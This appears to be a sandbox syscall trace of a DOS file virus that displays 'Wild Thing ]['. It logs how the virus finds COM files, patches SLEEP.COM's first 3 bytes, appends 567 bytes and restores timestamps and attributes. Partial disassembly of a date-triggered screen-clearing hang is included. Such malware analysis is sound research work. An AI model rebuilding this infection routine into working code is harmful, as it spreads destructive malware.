2018-12-25T12:42:13.512184437Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.518142004Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.520328594Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.521706731Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.523722158Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.526063181Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.527247509Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.528745054Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.532206303Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.533542752Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.537623683Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.539486964Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.540803804Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.542318847Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.548018559Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.549740455Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.551306805Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.553490101Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.557293075Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.560308423Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.561922898Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.564639888Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:42:13.57044128Z 62 PC: 8f90e | Close file
2018-12-25T12:42:13.57386535Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:42:13.576043349Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:42:13.578246913Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:42:13.584379526Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:42:13.586357095Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:42:13.591976044Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:42:13.594823233Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:42:13.596731363Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:42:13.598622142Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:42:13.601639149Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:42:13.607626006Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:42:13.609908789Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:42:13.613135284Z 73 PC: 8fa11 | Release memory
2018-12-25T12:42:13.615100625Z 73 PC: 8efea | Release memory
2018-12-25T12:42:13.616623504Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:42:13.619071762Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:42:13.621301732Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:42:13.623350226Z 73 PC: 8f060 | Release memory
2018-12-25T12:42:13.625695842Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:42:13.636627113Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:42:13.643110843Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:42:13.646101942Z 62 PC: 8f0d1 | Close file
2018-12-25T12:42:13.648804712Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:42:13.672632986Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:42:13.67474803Z 48 PC: 12bee | Get DOS version
2018-12-25T12:42:13.677085905Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:42:13.679616888Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:42:13.681969615Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:42:13.68408233Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:42:13.68568415Z 72 PC: 1355d | Allocate memory
2018-12-25T12:42:13.688434112Z 25 PC: 13596 | Get default drive
2018-12-25T12:42:13.689956161Z 71 PC: 135ad | Get current directory
2018-12-25T12:42:13.692643523Z 59 PC: 135ba | Change current directory
2018-12-25T12:42:13.69919212Z 59 PC: 135c8 | Change current directory
2018-12-25T12:42:13.706571618Z 59 PC: 135d3 | Change current directory
2018-12-25T12:42:13.710973558Z 25 PC: 12d13 | Get default drive
2018-12-25T12:42:13.716062026Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:42:13.717632542Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:42:13.719314677Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:13.72285097Z 80 PC: 1301d | Set current PSP
2018-12-25T12:42:13.724160284Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:42:13.725794609Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.728244901Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.730125332Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:42:13.732555831Z 72 PC: 130ec | Allocate memory
2018-12-25T12:42:13.734939729Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:42:13.742459433Z 62 PC: 131ba | Close file
2018-12-25T12:42:13.74495351Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:42:13.746822802Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:42:13.749171032Z 72 PC: 11991 | Allocate memory
2018-12-25T12:42:13.751425402Z 73 PC: 119b2 | Release memory
2018-12-25T12:42:13.75352248Z 72 PC: 119bd | Allocate memory
2018-12-25T12:42:13.75672945Z 73 PC: 119df | Release memory
2018-12-25T12:42:13.758136796Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:42:13.760015738Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:10.755129558Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:10.756835294Z 44 PC: 12b0e | Get time
0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:10.758460363Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:10.760576116Z 42 PC: 12c17 | Get date
0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:10.762516316Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:10.770091838Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:10.777322752Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:10.783656497Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:10.805746879Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:10.818743941Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:10.820450691Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:10.827082424Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:10.828928523Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:10.832236096Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.837688213Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:10.843647842Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:10.844972481Z 62 PC: 12bfc | Close file
2018-12-25T12:42:10.851651595Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:10.859028844Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.861155427Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.865488478Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.872604151Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.880091666Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.881459405Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.886750553Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.888165963Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.890232761Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.892514349Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.899738401Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.901832831Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.911346336Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.922145314Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.925060231Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.931913341Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.942788824Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.959657574Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.962346831Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.970453615Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.97226381Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.975680517Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.978406084Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.992713924Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.994887701Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.008003062Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.019839944Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.023286362Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.031695431Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.043556893Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.055833328Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.058720522Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.066705764Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.068705456Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.072327145Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.075508993Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.089561928Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.09248598Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.101999889Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.112993026Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.115977367Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.123469913Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.134712049Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.142579339Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.145293926Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.153351177Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.158683857Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.162863567Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.165326569Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.174721983Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.177054307Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.186781811Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.198134668Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.201527137Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.209349906Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.220973364Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.228792111Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.231654205Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.23955496Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.246271389Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.251787424Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.253369257Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.259601617Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.261386124Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.266897445Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.273284897Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.276033891Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.282538093Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.29368164Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.30109676Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.303109676Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.310160224Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.311630733Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.315437758Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.317330443Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.326275075Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.328944427Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.337590194Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.345751606Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.34836152Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.353031442Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.360083228Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.364653848Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.366357408Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.37323275Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.375738206Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.383675839Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.394579137Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.397706476Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:11.403117556Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:11.40512119Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:11.406761608Z 9 PC: 12b6a | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:42:13.610637486Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:42:13.612525307Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:42:13.615310324Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:42:13.619443878Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:42:13.631662407Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:42:13.633615256Z 62 PC: 91fc1 | Close file
2018-12-25T12:42:13.636928639Z 75 PC: 91fe0 | Execute program
2018-12-25T12:42:13.655662043Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:42:13.657393524Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:42:13.662756664Z 48 PC: c609 | Get DOS version
2018-12-25T12:42:13.666780462Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:42:13.669998788Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:42:13.674209809Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:42:13.682145764Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:13.691353089Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:13.698128536Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:42:13.710240233Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:42:13.712468614Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:42:13.715551423Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:42:13.741320179Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:42:13.746192223Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:42:13.748169918Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:13.751798281Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:13.753582418Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.755403379Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.758320774Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:42:13.767189166Z 62 PC: 8f8eb | Close file
2018-12-25T12:42:13.769634301Z 62 PC: 8f8f2 | Close file
2018-12-25T12:42:13.77287208Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.774883472Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.776816076Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.779887259Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.7822913Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.784466447Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.787713722Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.789528106Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.791354785Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.793442597Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.794767446Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.796090432Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.797918801Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.799205765Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.800519889Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.802391388Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.803708582Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.805078577Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.806990443Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.808360774Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.809648077Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.811446937Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.813340172Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.814742312Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.817196826Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.820084203Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.822098114Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.824281064Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.826517473Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.828565015Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:42:13.8337975Z 62 PC: 8f90e | Close file
2018-12-25T12:42:13.836515872Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:42:13.838391803Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:42:13.840372668Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:42:13.845577705Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:42:13.847430689Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:42:13.852481882Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:42:13.854431671Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:42:13.855822Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:42:13.857291437Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:42:13.85882886Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:42:13.859842706Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:42:13.861133405Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:42:13.862474261Z 73 PC: 8fa11 | Release memory
2018-12-25T12:42:13.866982963Z 73 PC: 8efea | Release memory
2018-12-25T12:42:13.868283219Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:42:13.870346536Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:42:13.871873383Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:42:13.873254122Z 73 PC: 8f060 | Release memory
2018-12-25T12:42:13.874761693Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:42:13.882641762Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:42:13.887711588Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:42:13.889607594Z 62 PC: 8f0d1 | Close file
2018-12-25T12:42:13.891689868Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:42:13.912569866Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:42:13.914037286Z 48 PC: 12bee | Get DOS version
2018-12-25T12:42:13.915360661Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:42:13.917757095Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:42:13.919077127Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:42:13.92028162Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:42:13.92162982Z 72 PC: 1355d | Allocate memory
2018-12-25T12:42:13.923540586Z 25 PC: 13596 | Get default drive
2018-12-25T12:42:13.924707517Z 71 PC: 135ad | Get current directory
2018-12-25T12:42:13.928865045Z 59 PC: 135ba | Change current directory
2018-12-25T12:42:13.935924236Z 59 PC: 135c8 | Change current directory
2018-12-25T12:42:13.940351893Z 59 PC: 135d3 | Change current directory
2018-12-25T12:42:13.942879212Z 25 PC: 12d13 | Get default drive
2018-12-25T12:42:13.94437159Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:42:13.945562138Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:42:13.946567377Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:13.948787528Z 80 PC: 1301d | Set current PSP
2018-12-25T12:42:13.950011619Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:42:13.95110743Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.952869558Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.95430652Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:42:13.956568074Z 72 PC: 130ec | Allocate memory
2018-12-25T12:42:13.960778546Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:42:13.966767431Z 62 PC: 131ba | Close file
2018-12-25T12:42:13.96914351Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:42:13.971181166Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:42:13.97352303Z 72 PC: 11991 | Allocate memory
2018-12-25T12:42:13.975454541Z 73 PC: 119b2 | Release memory
2018-12-25T12:42:13.977828429Z 72 PC: 119bd | Allocate memory
2018-12-25T12:42:13.979539672Z 73 PC: 119df | Release memory
2018-12-25T12:42:13.980793374Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:42:13.982872621Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:10.888986263Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:10.891595353Z 44 PC: 12b0e | Get time
0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:10.89450498Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:10.898024597Z 42 PC: 12c17 | Get date
0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:10.900894786Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:10.908358486Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:10.92089019Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:10.934084741Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:10.95309831Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:10.960971155Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:10.963008675Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:10.972354156Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:10.980267279Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:10.983668254Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.986660962Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:10.99859563Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:11.000446616Z 62 PC: 12bfc | Close file
2018-12-25T12:42:11.010018048Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:11.022340883Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.025708087Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.033031703Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.055067022Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.06397222Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.066140047Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.088960647Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.092247987Z 64 PC: 12be1 | Write file or device (See above)
